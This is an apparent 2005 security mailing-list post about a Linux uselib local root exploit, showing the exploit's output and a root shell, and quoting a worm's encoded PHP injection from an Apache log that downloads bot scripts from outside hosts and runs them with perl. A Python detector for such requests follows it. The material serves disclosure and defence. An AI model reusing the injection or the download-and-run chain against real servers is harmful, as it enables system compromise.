And we start the year rootable! :D

From: Carlos Tirado
Reply-To: Carlos Tirado
To: debian-security at lists.debian.org
Date: Mon, 10 Jan 2005 12:36:27 -0300
Subject: Re: local root exploit

carlos@tuxsystem:~/security$ ./elflbl -f
[+] SLAB cleanup
child 1 VMAs 65406
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xd4000000 - 0xe7ff1000
Wait... -
[+] race won maps=51294
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xd4915000

[+] gate modified ( 0xffec90f4 0x0804ec00 )
[+] exploited, uid=0

sh-2.05a# whoami
root

!!!!

more info http://isec.pl/vulnerabilities/isec-0021-uselib.txt

A patch is already out
for 2.4.28: http://www.grsecurity.net/linux-2.4.28-secfix-200501071141.patch
and for 2.6.10: http://www.grsecurity.net/linux-2.6.10-secfix-200501071130.patch

My system is:
Linux version 2.4.28 (root@tuxsystem) (gcc version 2.95.4 20011002 (Debian prerelease)) #2 Fri Nov 19 12:27:33 CLST 2004
on Debian Woody

How lovely! Local root :s And that is without counting the thousand or so Perl worms that try to sneak into the system day after day. Just look at my weblog's statistics at http://carlos.distro.cl/blog/stats (the things that use the lwp** user agent): they are lovely worms that leave requests in my Apache log like this:

205.209.134.190 - - [10/Jan/2005:12:43:54 -0300] "GET /blog/index.php?cat=1&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 158434

And so on, countless times a day! And all of them coming from vulnerable servers :s It looks like this year 2005 will be somewhat hectic :p
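A small detector for requests of the shape shown in the log line above, as an added example that is not part of the original post: it percent-decodes the request target until it stops changing (the `highlight` value is encoded twice, `%2527`) and flags PHP command-execution calls and download-and-run chains. The function names, the sample log lines, the 192.0.2.x addresses and the `example.invalid` host are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.*) HTTP/[\d.]+" (\d{3}) \S+')
# PHP functions that hand a string to the shell
PHP_EXEC = re.compile(r"\b(passthru|system|shell_exec|exec|popen)\s*\(", re.I)
# A download followed by an interpreter, like the wget ...;perl ... chain in the post
FETCH_RUN = re.compile(r"\b(wget|curl)\b[^&]*;\s*(perl|sh|bash)\b", re.I)

def fully_decode(text, max_rounds=5):
    """Percent-decode until stable; return (decoded, rounds that changed it)."""
    rounds = 0
    while rounds < max_rounds:
        nxt = unquote(text)
        if nxt == text:
            break
        text, rounds = nxt, rounds + 1
    return text, rounds

def inspect(line):
    """Return None for unparseable lines, else a dict with the findings."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, method, target, status = m.groups()
    decoded, rounds = fully_decode(target)
    reasons = []
    if rounds > 1:                      # e.g. %2527 -> %27 -> '
        reasons.append("multi-encoded")
    if PHP_EXEC.search(decoded):
        reasons.append("php-exec")
    if FETCH_RUN.search(decoded):
        reasons.append("fetch-and-run")
    return {"host": host, "status": int(status), "reasons": reasons, "decoded": decoded}

# Constructed sample lines (documentation addresses, placeholder host)
SAMPLE = [
    '192.0.2.10 - - [10/Jan/2005:12:43:54 -0300] "GET /blog/index.php?cat=1&rush=%65%63%68%6F%20ok'
    '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 158434',
    '192.0.2.11 - - [10/Jan/2005:12:44:02 -0300] "GET /blog/index.php?cat=1&rush=wget%20http://example.invalid/b;perl%20b HTTP/1.1" 200 9120',
    '192.0.2.12 - - [10/Jan/2005:12:45:10 -0300] "GET /blog/index.php?cat=1&highlight=debian%20woody HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        hit = inspect(entry)
        print(hit["host"], hit["reasons"] or "clean")
```

A 200 status on a flagged line only means the page was served; whether the injected command ran has to be checked on the host itself.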

